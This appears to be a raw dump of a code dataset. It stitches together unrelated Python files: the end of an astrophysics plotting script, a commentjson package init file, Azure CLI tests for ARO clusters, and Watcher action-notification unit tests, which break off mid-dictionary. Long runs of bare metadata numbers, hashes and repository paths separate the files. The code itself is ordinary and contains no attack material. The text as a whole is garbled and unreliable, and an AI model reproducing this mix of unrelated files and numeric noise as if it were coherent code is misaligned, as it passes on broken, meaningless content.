bkgd.tick_params(labelcolor='none', top='off', bottom='off', left='off', right='off')
bkgd.set_xlabel(r'$\mathtt{log \; SSFR \;[yr^{-1}]}$', fontsize=25)
plt.show()
return None
if __name__=="__main__":
test_CentralSMHMR()
#test_Evolver_time('random_step_fluct', nsnap0=15, downsampled='14', tduty=1., abias=0.)
#test_RandomStep_timescale(sig_smhm=0.2, nsnap_ancestor=15)
#EvolverPlots('constant_offset')
#EvolverPlots('corr_constant_offset')
#EvolverPlots('random_step', nsnap0=15)
#test_AssemblyBias(0.0, nsnap0=15, downsampled='14')
#test_Evolver_AssemblyBias(0.3, nsnap0=15)
#EvolverPlots('constant_offset', nsnap0=15)
#EvolverPlots('random_step', nsnap0=15)
#EvolverPlots('random_step_fluct', nsnap0=15)
#EvolverPlots('random_step_abias2', nsnap0=15)
#test_Evolver_logSFRinitiate('random_step_abias', nsnap0=15)
#test_Evolver_logSFRinitiate('random_step_fluct', nsnap0=15)
#test_Evolver_ODEsolver('random_step_fluct', nsnap0=15)
#test_EvolverEvolve('smf', nsnap0=15, downsampled='14')
#test_EvolverInitiate('pssfr', 15)
#test_EvolverInitSF('pssfr', 15, nsnap0=15, downsampled='14')
#test_assignSFRs()
| 39.992777
| 127
| 0.565531
| 7,230
| 49,831
| 3.738036
| 0.059751
| 0.027085
| 0.014986
| 0.018871
| 0.845334
| 0.812551
| 0.789462
| 0.766188
| 0.754496
| 0.741878
| 0
| 0.04044
| 0.248701
| 49,831
| 1,245
| 128
| 40.0249
| 0.681447
| 0.089944
| 0
| 0.758323
| 0
| 0
| 0.109313
| 0.005221
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.013564
| null | null | 0.013564
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
cedddeedf3b9cafd3319b7a23f662f2f1cf814f6
| 209
|
py
|
Python
|
commentjson/__init__.py
|
mattpearson/commentjson
|
cb7219dcc6761c7c06cca0d8724908bc2477ab29
|
[
"MIT"
] | null | null | null |
commentjson/__init__.py
|
mattpearson/commentjson
|
cb7219dcc6761c7c06cca0d8724908bc2477ab29
|
[
"MIT"
] | null | null | null |
commentjson/__init__.py
|
mattpearson/commentjson
|
cb7219dcc6761c7c06cca0d8724908bc2477ab29
|
[
"MIT"
] | null | null | null |
from .commentjson import dump
from .commentjson import dumps
from .commentjson import JSONLibraryException
from .commentjson import ParserException
from .commentjson import load
from .commentjson import loads
| 29.857143
| 45
| 0.856459
| 24
| 209
| 7.458333
| 0.375
| 0.502793
| 0.703911
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.114833
| 209
| 6
| 46
| 34.833333
| 0.967568
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
0c6fb3588766073fbb9d71f8aa6745f4c3cdf5b4
| 15,265
|
py
|
Python
|
src/azure-cli/azure/cli/command_modules/aro/tests/latest/test_aro_commands.py
|
kwoodson/azure-cli
|
4efdc3a2f1d72d1102d8a1969bbc97b518353d6a
|
[
"MIT"
] | 2
|
2020-08-08T11:00:25.000Z
|
2020-08-08T11:00:30.000Z
|
src/azure-cli/azure/cli/command_modules/aro/tests/latest/test_aro_commands.py
|
kwoodson/azure-cli
|
4efdc3a2f1d72d1102d8a1969bbc97b518353d6a
|
[
"MIT"
] | 1
|
2021-06-02T02:49:48.000Z
|
2021-06-02T02:49:48.000Z
|
src/azure-cli/azure/cli/command_modules/aro/tests/latest/test_aro_commands.py
|
anjannaskar93/azure-cli-100
|
cc3a15959e8a19a3e24fa4e8648dea3c32ffd901
|
[
"MIT"
] | 1
|
2020-07-31T17:22:13.000Z
|
2020-07-31T17:22:13.000Z
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
import os
import unittest
from random import randint
import mock
from knack.log import get_logger
from azure_devtools.scenario_tests import AllowLargeResponse
from azure.cli.testsdk import ScenarioTest, ResourceGroupPreparer
from azure.cli.testsdk.checkers import StringContainCheck
logger = get_logger(__name__)
class AroScenarioTests(ScenarioTest):
@AllowLargeResponse()
@ResourceGroupPreparer(random_name_length=28, name_prefix='cli_test_aro_create', location='eastus')
def test_aro_create(self, resource_group):
from msrestazure.tools import resource_id
subscription = self.get_subscription_id()
master_subnet = self.create_random_name('dev_master', 14)
worker_subnet = self.create_random_name('dev_worker', 14)
self.kwargs.update({
'name': self.create_random_name('aro', 14),
'resource_group': resource_group,
'subscription': subscription,
'master_subnet': master_subnet,
'worker_subnet': worker_subnet,
'master_ip_range': '10.{}.{}.0/24'.format(randint(0, 127), randint(0, 255)),
'worker_ip_range': '10.{}.{}.0/24'.format(randint(0, 127), randint(0, 255)),
'master_subnet_resource': resource_id(subscription=subscription, resource_group=resource_group, namespace='Microsoft.Network', type='virtualNetworks', child_type_1='subnets', name='dev-vnet', child_name_1=master_subnet),
'worker_subnet_resource': resource_id(subscription=subscription, resource_group=resource_group, namespace='Microsoft.Network', type='virtualNetworks', child_type_1='subnets', name='dev-vnet', child_name_1=worker_subnet),
})
self.cmd('network vnet create -g {rg} -n dev-vnet --address-prefixes 10.0.0.0/9')
self.cmd('network vnet subnet create -g {rg} --vnet-name dev-vnet -n {master_subnet} --address-prefixes {master_ip_range} --service-endpoints Microsoft.ContainerRegistry')
self.cmd('network vnet subnet create -g {rg} --vnet-name dev-vnet -n {worker_subnet} --address-prefixes {worker_ip_range} --service-endpoints Microsoft.ContainerRegistry')
self.cmd('network vnet subnet update -g {rg} --vnet-name dev-vnet -n {master_subnet} --disable-private-link-service-network-policies true')
with mock.patch('azure.cli.command_modules.aro._rbac._gen_uuid', side_effect=self.create_guid):
self.cmd('aro create -g {rg} -n {name} --master-subnet {master_subnet_resource} --worker-subnet {worker_subnet_resource} --subscription {subscription} --tags test=create', checks=[
self.check('tags.test', 'create'),
self.check('name', '{name}'),
self.check('masterProfile.subnetId', '{master_subnet_resource}'),
self.check('workerProfiles[0].subnetId', '{worker_subnet_resource}'),
self.check('provisioningState', 'Succeeded')
])
@AllowLargeResponse()
@ResourceGroupPreparer(random_name_length=28, name_prefix='cli_test_aro_list_cred', location='eastus')
def test_aro_list_credentials(self, resource_group):
from msrestazure.tools import resource_id
subscription = self.get_subscription_id()
master_subnet = self.create_random_name('dev_master', 14)
worker_subnet = self.create_random_name('dev_worker', 14)
self.kwargs.update({
'name': self.create_random_name('aro', 14),
'resource_group': resource_group,
'subscription': subscription,
'master_subnet': master_subnet,
'worker_subnet': worker_subnet,
'master_ip_range': '10.{}.{}.0/24'.format(randint(0, 127), randint(0, 255)),
'worker_ip_range': '10.{}.{}.0/24'.format(randint(0, 127), randint(0, 255)),
'master_subnet_resource': resource_id(subscription=subscription, resource_group=resource_group, namespace='Microsoft.Network', type='virtualNetworks', child_type_1='subnets', name='dev-vnet', child_name_1=master_subnet),
'worker_subnet_resource': resource_id(subscription=subscription, resource_group=resource_group, namespace='Microsoft.Network', type='virtualNetworks', child_type_1='subnets', name='dev-vnet', child_name_1=worker_subnet),
})
self.cmd('network vnet create -g {rg} -n dev-vnet --address-prefixes 10.0.0.0/9')
self.cmd('network vnet subnet create -g {rg} --vnet-name dev-vnet -n {master_subnet} --address-prefixes {master_ip_range} --service-endpoints Microsoft.ContainerRegistry')
self.cmd('network vnet subnet create -g {rg} --vnet-name dev-vnet -n {worker_subnet} --address-prefixes {worker_ip_range} --service-endpoints Microsoft.ContainerRegistry')
self.cmd('network vnet subnet update -g {rg} --vnet-name dev-vnet -n {master_subnet} --disable-private-link-service-network-policies true')
with mock.patch('azure.cli.command_modules.aro._rbac._gen_uuid', side_effect=self.create_guid):
self.cmd('aro create -g {rg} -n {name} --master-subnet {master_subnet_resource} --worker-subnet {worker_subnet_resource} --subscription {subscription} --tags test=list-cred')
self.cmd('aro list-credentials -g {rg} -n {name} --subscription {subscription}', checks=[self.check('kubeadminUsername', 'kubeadmin')])
@AllowLargeResponse()
@ResourceGroupPreparer(random_name_length=28, name_prefix='cli_test_aro_show', location='eastus')
def test_aro_show(self, resource_group):
from msrestazure.tools import resource_id
subscription = self.get_subscription_id()
master_subnet = self.create_random_name('dev_master', 14)
worker_subnet = self.create_random_name('dev_worker', 14)
name = self.create_random_name('aro', 14)
self.kwargs.update({
'name': name,
'resource_group': resource_group,
'subscription': subscription,
'master_subnet': master_subnet,
'worker_subnet': worker_subnet,
'master_ip_range': '10.{}.{}.0/24'.format(randint(0, 127), randint(0, 255)),
'worker_ip_range': '10.{}.{}.0/24'.format(randint(0, 127), randint(0, 255)),
'master_subnet_resource': resource_id(subscription=subscription, resource_group=resource_group, namespace='Microsoft.Network', type='virtualNetworks', child_type_1='subnets', name='dev-vnet', child_name_1=master_subnet),
'worker_subnet_resource': resource_id(subscription=subscription, resource_group=resource_group, namespace='Microsoft.Network', type='virtualNetworks', child_type_1='subnets', name='dev-vnet', child_name_1=worker_subnet),
})
self.cmd('network vnet create -g {rg} -n dev-vnet --address-prefixes 10.0.0.0/9')
self.cmd('network vnet subnet create -g {rg} --vnet-name dev-vnet -n {master_subnet} --address-prefixes {master_ip_range} --service-endpoints Microsoft.ContainerRegistry')
self.cmd('network vnet subnet create -g {rg} --vnet-name dev-vnet -n {worker_subnet} --address-prefixes {worker_ip_range} --service-endpoints Microsoft.ContainerRegistry')
self.cmd('network vnet subnet update -g {rg} --vnet-name dev-vnet -n {master_subnet} --disable-private-link-service-network-policies true')
with mock.patch('azure.cli.command_modules.aro._rbac._gen_uuid', side_effect=self.create_guid):
self.cmd('aro create -g {rg} -n {name} --master-subnet {master_subnet_resource} --worker-subnet {worker_subnet_resource} --subscription {subscription} --tags test=show')
self.cmd('aro show -g {rg} -n {name} --subscription {subscription} --output table', checks=[
StringContainCheck(name),
StringContainCheck(resource_group),
StringContainCheck('eastus'),
StringContainCheck('Succeeded'),
])
@AllowLargeResponse()
@ResourceGroupPreparer(random_name_length=28, name_prefix='cli_test_aro_list', location='eastus')
def test_aro_list(self, resource_group):
from msrestazure.tools import resource_id
subscription = self.get_subscription_id()
master_subnet = self.create_random_name('dev_master', 14)
worker_subnet = self.create_random_name('dev_worker', 14)
self.kwargs.update({
'name': self.create_random_name('aro', 14),
'resource_group': resource_group,
'subscription': subscription,
'master_subnet': master_subnet,
'worker_subnet': worker_subnet,
'master_ip_range': '10.{}.{}.0/24'.format(randint(0, 127), randint(0, 255)),
'worker_ip_range': '10.{}.{}.0/24'.format(randint(0, 127), randint(0, 255)),
'master_subnet_resource': resource_id(subscription=subscription, resource_group=resource_group, namespace='Microsoft.Network', type='virtualNetworks', child_type_1='subnets', name='dev-vnet', child_name_1=master_subnet),
'worker_subnet_resource': resource_id(subscription=subscription, resource_group=resource_group, namespace='Microsoft.Network', type='virtualNetworks', child_type_1='subnets', name='dev-vnet', child_name_1=worker_subnet),
})
self.cmd('network vnet create -g {rg} -n dev-vnet --address-prefixes 10.0.0.0/9')
self.cmd('network vnet subnet create -g {rg} --vnet-name dev-vnet -n {master_subnet} --address-prefixes {master_ip_range} --service-endpoints Microsoft.ContainerRegistry')
self.cmd('network vnet subnet create -g {rg} --vnet-name dev-vnet -n {worker_subnet} --address-prefixes {worker_ip_range} --service-endpoints Microsoft.ContainerRegistry')
self.cmd('network vnet subnet update -g {rg} --vnet-name dev-vnet -n {master_subnet} --disable-private-link-service-network-policies true')
with mock.patch('azure.cli.command_modules.aro._rbac._gen_uuid', side_effect=self.create_guid):
self.cmd('aro create -g {rg} -n {name} --master-subnet {master_subnet_resource} --worker-subnet {worker_subnet_resource} --subscription {subscription} --tags test=list')
self.cmd('aro list -g {rg} --subscription {subscription}', checks=[
self.check('[0].name', '{name}'),
self.check('[0].provisioningState', 'Succeeded'),
self.check_pattern('[0].id', '.*{name}')
])
@AllowLargeResponse()
@ResourceGroupPreparer(random_name_length=28, name_prefix='cli_test_aro_delete', location='eastus')
def test_aro_delete(self, resource_group):
from msrestazure.tools import resource_id
subscription = self.get_subscription_id()
master_subnet = self.create_random_name('dev_master', 14)
worker_subnet = self.create_random_name('dev_worker', 14)
self.kwargs.update({
'name': self.create_random_name('aro', 14),
'resource_group': resource_group,
'subscription': subscription,
'master_subnet': master_subnet,
'worker_subnet': worker_subnet,
'master_ip_range': '10.{}.{}.0/24'.format(randint(0, 127), randint(0, 255)),
'worker_ip_range': '10.{}.{}.0/24'.format(randint(0, 127), randint(0, 255)),
'master_subnet_resource': resource_id(subscription=subscription, resource_group=resource_group, namespace='Microsoft.Network', type='virtualNetworks', child_type_1='subnets', name='dev-vnet', child_name_1=master_subnet),
'worker_subnet_resource': resource_id(subscription=subscription, resource_group=resource_group, namespace='Microsoft.Network', type='virtualNetworks', child_type_1='subnets', name='dev-vnet', child_name_1=worker_subnet),
})
self.cmd('network vnet create -g {rg} -n dev-vnet --address-prefixes 10.0.0.0/9')
self.cmd('network vnet subnet create -g {rg} --vnet-name dev-vnet -n {master_subnet} --address-prefixes {master_ip_range} --service-endpoints Microsoft.ContainerRegistry')
self.cmd('network vnet subnet create -g {rg} --vnet-name dev-vnet -n {worker_subnet} --address-prefixes {worker_ip_range} --service-endpoints Microsoft.ContainerRegistry')
self.cmd('network vnet subnet update -g {rg} --vnet-name dev-vnet -n {master_subnet} --disable-private-link-service-network-policies true')
with mock.patch('azure.cli.command_modules.aro._rbac._gen_uuid', side_effect=self.create_guid):
self.cmd('aro create -g {rg} -n {name} --master-subnet {master_subnet_resource} --worker-subnet {worker_subnet_resource} --subscription {subscription} --tags test=delete')
self.cmd('aro delete -y -g {rg} -n {name} --subscription {subscription}', expect_failure=False)
@AllowLargeResponse()
@ResourceGroupPreparer(random_name_length=28, name_prefix='cli_test_aro_update', location='eastus')
def test_aro_update(self, resource_group):
from msrestazure.tools import resource_id
subscription = self.get_subscription_id()
master_subnet = self.create_random_name('dev_master', 14)
worker_subnet = self.create_random_name('dev_worker', 14)
self.kwargs.update({
'name': self.create_random_name('aro', 14),
'resource_group': resource_group,
'subscription': subscription,
'master_subnet': master_subnet,
'worker_subnet': worker_subnet,
'master_ip_range': '10.{}.{}.0/24'.format(randint(0, 127), randint(0, 255)),
'worker_ip_range': '10.{}.{}.0/24'.format(randint(0, 127), randint(0, 255)),
'master_subnet_resource': resource_id(subscription=subscription, resource_group=resource_group, namespace='Microsoft.Network', type='virtualNetworks', child_type_1='subnets', name='dev-vnet', child_name_1=master_subnet),
'worker_subnet_resource': resource_id(subscription=subscription, resource_group=resource_group, namespace='Microsoft.Network', type='virtualNetworks', child_type_1='subnets', name='dev-vnet', child_name_1=worker_subnet),
})
self.cmd('network vnet create -g {rg} -n dev-vnet --address-prefixes 10.0.0.0/9')
self.cmd('network vnet subnet create -g {rg} --vnet-name dev-vnet -n {master_subnet} --address-prefixes {master_ip_range} --service-endpoints Microsoft.ContainerRegistry')
self.cmd('network vnet subnet create -g {rg} --vnet-name dev-vnet -n {worker_subnet} --address-prefixes {worker_ip_range} --service-endpoints Microsoft.ContainerRegistry')
self.cmd('network vnet subnet update -g {rg} --vnet-name dev-vnet -n {master_subnet} --disable-private-link-service-network-policies true')
with mock.patch('azure.cli.command_modules.aro._rbac._gen_uuid', side_effect=self.create_guid):
self.cmd('aro create -g {rg} -n {name} --master-subnet {master_subnet_resource} --worker-subnet {worker_subnet_resource} --subscription {subscription} --tags test=update')
self.cmd('aro update -g {rg} -n {name} --subscription {subscription}', expect_failure=False)
| 67.246696
| 232
| 0.688241
| 1,882
| 15,265
| 5.352816
| 0.069075
| 0.065515
| 0.032758
| 0.042883
| 0.902918
| 0.886043
| 0.874131
| 0.871253
| 0.871253
| 0.861326
| 0
| 0.020998
| 0.163904
| 15,265
| 226
| 233
| 67.544248
| 0.768315
| 0.022011
| 0
| 0.731429
| 0
| 0.171429
| 0.445189
| 0.104999
| 0
| 0
| 0
| 0
| 0
| 1
| 0.034286
| false
| 0
| 0.08
| 0
| 0.12
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0c8675bccd5384229259eb1af6b81163bec0cc68
| 22,442
|
py
|
Python
|
python-watcher-2.0.0/watcher/tests/notifications/test_action_notification.py
|
scottwedge/OpenStack-Stein
|
7077d1f602031dace92916f14e36b124f474de15
|
[
"Apache-2.0"
] | null | null | null |
python-watcher-2.0.0/watcher/tests/notifications/test_action_notification.py
|
scottwedge/OpenStack-Stein
|
7077d1f602031dace92916f14e36b124f474de15
|
[
"Apache-2.0"
] | 5
|
2019-08-14T06:46:03.000Z
|
2021-12-13T20:01:25.000Z
|
python-watcher-2.0.0/watcher/tests/notifications/test_action_notification.py
|
scottwedge/OpenStack-Stein
|
7077d1f602031dace92916f14e36b124f474de15
|
[
"Apache-2.0"
] | 2
|
2020-03-15T01:24:15.000Z
|
2020-07-22T20:34:26.000Z
|
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import freezegun
import mock
import oslo_messaging as om
from watcher.common import exception
from watcher.common import rpc
from watcher import notifications
from watcher import objects
from watcher.tests.db import base
from watcher.tests.objects import utils
@freezegun.freeze_time('2016-10-18T09:52:05.219414')
class TestActionNotification(base.DbTestCase):
def setUp(self):
super(TestActionNotification, self).setUp()
p_get_notifier = mock.patch.object(rpc, 'get_notifier')
m_get_notifier = p_get_notifier.start()
self.addCleanup(p_get_notifier.stop)
self.m_notifier = mock.Mock(spec=om.Notifier)
def fake_get_notifier(publisher_id):
self.m_notifier.publisher_id = publisher_id
return self.m_notifier
m_get_notifier.side_effect = fake_get_notifier
self.goal = utils.create_test_goal(mock.Mock())
self.strategy = utils.create_test_strategy(mock.Mock())
self.audit = utils.create_test_audit(mock.Mock(),
strategy_id=self.strategy.id)
self.action_plan = utils.create_test_action_plan(mock.Mock())
def test_send_invalid_action_plan(self):
action_plan = utils.get_test_action_plan(
mock.Mock(), state='DOESNOTMATTER', audit_id=1)
self.assertRaises(
exception.InvalidActionPlan,
notifications.action_plan.send_update,
mock.MagicMock(), action_plan, host='node0')
def test_send_action_update(self):
action = utils.create_test_action(
mock.Mock(), state=objects.action.State.ONGOING,
action_type='nop', input_parameters={'param1': 1, 'param2': 2},
parents=[], action_plan_id=self.action_plan.id)
notifications.action.send_update(
mock.MagicMock(), action, host='node0',
old_state=objects.action.State.PENDING)
# The 1st notification is because we created the object.
# The 2nd notification is because we created the action plan object.
self.assertEqual(4, self.m_notifier.info.call_count)
notification = self.m_notifier.info.call_args[1]
payload = notification['payload']
self.assertEqual("infra-optim:node0", self.m_notifier.publisher_id)
self.assertDictEqual(
{
'watcher_object.namespace': 'watcher',
'watcher_object.version': '1.0',
'watcher_object.name': 'ActionUpdatePayload',
'watcher_object.data': {
'uuid': '10a47dd1-4874-4298-91cf-eff046dbdb8d',
'input_parameters': {
'param2': 2,
'param1': 1
},
'created_at': '2016-10-18T09:52:05Z',
'updated_at': None,
'state_update': {
'watcher_object.namespace': 'watcher',
'watcher_object.version': '1.0',
'watcher_object.name': 'ActionStateUpdatePayload',
'watcher_object.data': {
'old_state': 'PENDING',
'state': 'ONGOING'
}
},
'state': 'ONGOING',
'action_plan': {
'watcher_object.namespace': 'watcher',
'watcher_object.version': '1.1',
'watcher_object.name': 'TerseActionPlanPayload',
'watcher_object.data': {
'uuid': '76be87bd-3422-43f9-93a0-e85a577e3061',
'global_efficacy': [],
'created_at': '2016-10-18T09:52:05Z',
'updated_at': None,
'state': 'ONGOING',
'audit_uuid': '10a47dd1-4874-4298'
'-91cf-eff046dbdb8d',
'strategy_uuid': 'cb3d0b58-4415-4d90'
'-b75b-1e96878730e3',
'deleted_at': None
}
},
'parents': [],
'action_type': 'nop',
'deleted_at': None
}
},
payload
)
def test_send_action_plan_create(self):
action = utils.create_test_action(
mock.Mock(), state=objects.action.State.PENDING,
action_type='nop', input_parameters={'param1': 1, 'param2': 2},
parents=[], action_plan_id=self.action_plan.id)
notifications.action.send_create(mock.MagicMock(), action,
host='node0')
self.assertEqual(4, self.m_notifier.info.call_count)
notification = self.m_notifier.info.call_args[1]
payload = notification['payload']
self.assertEqual("infra-optim:node0", self.m_notifier.publisher_id)
self.assertDictEqual(
{
'watcher_object.namespace': 'watcher',
'watcher_object.version': '1.0',
'watcher_object.name': 'ActionCreatePayload',
'watcher_object.data': {
'uuid': '10a47dd1-4874-4298-91cf-eff046dbdb8d',
'input_parameters': {
'param2': 2,
'param1': 1
},
'created_at': '2016-10-18T09:52:05Z',
'updated_at': None,
'state': 'PENDING',
'action_plan': {
'watcher_object.namespace': 'watcher',
'watcher_object.version': '1.1',
'watcher_object.name': 'TerseActionPlanPayload',
'watcher_object.data': {
'uuid': '76be87bd-3422-43f9-93a0-e85a577e3061',
'global_efficacy': [],
'created_at': '2016-10-18T09:52:05Z',
'updated_at': None,
'state': 'ONGOING',
'audit_uuid': '10a47dd1-4874-4298'
'-91cf-eff046dbdb8d',
'strategy_uuid': 'cb3d0b58-4415-4d90'
'-b75b-1e96878730e3',
'deleted_at': None
}
},
'parents': [],
'action_type': 'nop',
'deleted_at': None
}
},
payload
)
def test_send_action_delete(self):
action = utils.create_test_action(
mock.Mock(), state=objects.action.State.DELETED,
action_type='nop', input_parameters={'param1': 1, 'param2': 2},
parents=[], action_plan_id=self.action_plan.id)
notifications.action.send_delete(mock.MagicMock(), action,
host='node0')
# The 1st notification is because we created the audit object.
# The 2nd notification is because we created the action plan object.
self.assertEqual(4, self.m_notifier.info.call_count)
notification = self.m_notifier.info.call_args[1]
payload = notification['payload']
self.assertEqual("infra-optim:node0", self.m_notifier.publisher_id)
self.assertDictEqual(
{
'watcher_object.namespace': 'watcher',
'watcher_object.version': '1.0',
'watcher_object.name': 'ActionDeletePayload',
'watcher_object.data': {
'uuid': '10a47dd1-4874-4298-91cf-eff046dbdb8d',
'input_parameters': {
'param2': 2,
'param1': 1
},
'created_at': '2016-10-18T09:52:05Z',
'updated_at': None,
'state': 'DELETED',
'action_plan': {
'watcher_object.namespace': 'watcher',
'watcher_object.version': '1.1',
'watcher_object.name': 'TerseActionPlanPayload',
'watcher_object.data': {
'uuid': '76be87bd-3422-43f9-93a0-e85a577e3061',
'global_efficacy': [],
'created_at': '2016-10-18T09:52:05Z',
'updated_at': None,
'state': 'ONGOING',
'audit_uuid': '10a47dd1-4874-4298'
'-91cf-eff046dbdb8d',
'strategy_uuid': 'cb3d0b58-4415-4d90'
'-b75b-1e96878730e3',
'deleted_at': None
}
},
'parents': [],
'action_type': 'nop',
'deleted_at': None
}
},
payload
)
def test_send_action_execution(self):
action = utils.create_test_action(
mock.Mock(), state=objects.action.State.PENDING,
action_type='nop', input_parameters={'param1': 1, 'param2': 2},
parents=[], action_plan_id=self.action_plan.id)
notifications.action.send_execution_notification(
mock.MagicMock(), action, 'execution', phase='start', host='node0')
# The 1st notification is because we created the audit object.
# The 2nd notification is because we created the action plan object.
self.assertEqual(4, self.m_notifier.info.call_count)
notification = self.m_notifier.info.call_args[1]
self.assertEqual("infra-optim:node0", self.m_notifier.publisher_id)
self.assertDictEqual(
{
'event_type': 'action.execution.start',
'payload': {
'watcher_object.namespace': 'watcher',
'watcher_object.version': '1.0',
'watcher_object.name': 'ActionExecutionPayload',
'watcher_object.data': {
'uuid': '10a47dd1-4874-4298-91cf-eff046dbdb8d',
'input_parameters': {
'param2': 2,
'param1': 1
},
'created_at': '2016-10-18T09:52:05Z',
'fault': None,
'updated_at': None,
'state': 'PENDING',
'action_plan': {
'watcher_object.namespace': 'watcher',
'watcher_object.version': '1.1',
'watcher_object.name': 'TerseActionPlanPayload',
'watcher_object.data': {
'uuid': '76be87bd-3422-43f9-93a0-e85a577e3061',
'global_efficacy': [],
'created_at': '2016-10-18T09:52:05Z',
'updated_at': None,
'state': 'ONGOING',
'audit_uuid': '10a47dd1-4874-4298'
'-91cf-eff046dbdb8d',
'strategy_uuid': 'cb3d0b58-4415-4d90'
'-b75b-1e96878730e3',
'deleted_at': None
}
},
'parents': [],
'action_type': 'nop',
'deleted_at': None
}
}
},
notification
)
def test_send_action_execution_with_error(self):
action = utils.create_test_action(
mock.Mock(), state=objects.action.State.FAILED,
action_type='nop', input_parameters={'param1': 1, 'param2': 2},
parents=[], action_plan_id=self.action_plan.id)
try:
# This is to load the exception in sys.exc_info()
raise exception.WatcherException("TEST")
except exception.WatcherException:
notifications.action.send_execution_notification(
mock.MagicMock(), action, 'execution', phase='error',
host='node0', priority='error')
self.assertEqual(1, self.m_notifier.error.call_count)
notification = self.m_notifier.error.call_args[1]
self.assertEqual("infra-optim:node0", self.m_notifier.publisher_id)
self.assertDictEqual(
{
'event_type': 'action.execution.error',
'payload': {
'watcher_object.namespace': 'watcher',
'watcher_object.version': '1.0',
'watcher_object.name': 'ActionExecutionPayload',
'watcher_object.data': {
'uuid': '10a47dd1-4874-4298-91cf-eff046dbdb8d',
'input_parameters': {
'param2': 2,
'param1': 1
},
'created_at': '2016-10-18T09:52:05Z',
'fault': {
'watcher_object.data': {
'exception': u'WatcherException',
'exception_message': u'TEST',
'function_name': (
'test_send_action_execution_with_error'),
'module_name': (
'watcher.tests.notifications.'
'test_action_notification')
},
'watcher_object.name': 'ExceptionPayload',
'watcher_object.namespace': 'watcher',
'watcher_object.version': '1.0'
},
'updated_at': None,
'state': 'FAILED',
'action_plan': {
'watcher_object.namespace': 'watcher',
'watcher_object.version': '1.1',
'watcher_object.name': 'TerseActionPlanPayload',
'watcher_object.data': {
'uuid': '76be87bd-3422-43f9-93a0-e85a577e3061',
'global_efficacy': [],
'created_at': '2016-10-18T09:52:05Z',
'updated_at': None,
'state': 'ONGOING',
'audit_uuid': '10a47dd1-4874-4298'
'-91cf-eff046dbdb8d',
'strategy_uuid': 'cb3d0b58-4415-4d90'
'-b75b-1e96878730e3',
'deleted_at': None
}
},
'parents': [],
'action_type': 'nop',
'deleted_at': None
}
}
},
notification
)
def test_send_action_cancel(self):
action = utils.create_test_action(
mock.Mock(), state=objects.action.State.PENDING,
action_type='nop', input_parameters={'param1': 1, 'param2': 2},
parents=[], action_plan_id=self.action_plan.id)
notifications.action.send_cancel_notification(
mock.MagicMock(), action, 'cancel', phase='start', host='node0')
# The 1st notification is because we created the audit object.
# The 2nd notification is because we created the action plan object.
self.assertEqual(4, self.m_notifier.info.call_count)
notification = self.m_notifier.info.call_args[1]
self.assertEqual("infra-optim:node0", self.m_notifier.publisher_id)
self.assertDictEqual(
{
'event_type': 'action.cancel.start',
'payload': {
'watcher_object.namespace': 'watcher',
'watcher_object.version': '1.0',
'watcher_object.name': 'ActionCancelPayload',
'watcher_object.data': {
'uuid': '10a47dd1-4874-4298-91cf-eff046dbdb8d',
'input_parameters': {
'param2': 2,
'param1': 1
},
'created_at': '2016-10-18T09:52:05Z',
'fault': None,
'updated_at': None,
'state': 'PENDING',
'action_plan': {
'watcher_object.namespace': 'watcher',
'watcher_object.version': '1.1',
'watcher_object.name': 'TerseActionPlanPayload',
'watcher_object.data': {
'uuid': '76be87bd-3422-43f9-93a0-e85a577e3061',
'global_efficacy': [],
'created_at': '2016-10-18T09:52:05Z',
'updated_at': None,
'state': 'ONGOING',
'audit_uuid': '10a47dd1-4874-4298'
'-91cf-eff046dbdb8d',
'strategy_uuid': 'cb3d0b58-4415-4d90'
'-b75b-1e96878730e3',
'deleted_at': None
}
},
'parents': [],
'action_type': 'nop',
'deleted_at': None
}
}
},
notification
)
def test_send_action_cancel_with_error(self):
action = utils.create_test_action(
mock.Mock(), state=objects.action.State.FAILED,
action_type='nop', input_parameters={'param1': 1, 'param2': 2},
parents=[], action_plan_id=self.action_plan.id)
try:
# This is to load the exception in sys.exc_info()
raise exception.WatcherException("TEST")
except exception.WatcherException:
notifications.action.send_cancel_notification(
mock.MagicMock(), action, 'cancel', phase='error',
host='node0', priority='error')
self.assertEqual(1, self.m_notifier.error.call_count)
notification = self.m_notifier.error.call_args[1]
self.assertEqual("infra-optim:node0", self.m_notifier.publisher_id)
self.assertDictEqual(
{
'event_type': 'action.cancel.error',
'payload': {
'watcher_object.namespace': 'watcher',
'watcher_object.version': '1.0',
'watcher_object.name': 'ActionCancelPayload',
'watcher_object.data': {
'uuid': '10a47dd1-4874-4298-91cf-eff046dbdb8d',
'input_parameters': {
'param2': 2,
'param1': 1
},
'created_at': '2016-10-18T09:52:05Z',
'fault': {
'watcher_object.data': {
'exception': u'WatcherException',
'exception_message': u'TEST',
'function_name': (
'test_send_action_cancel_with_error'),
'module_name': (
'watcher.tests.notifications.'
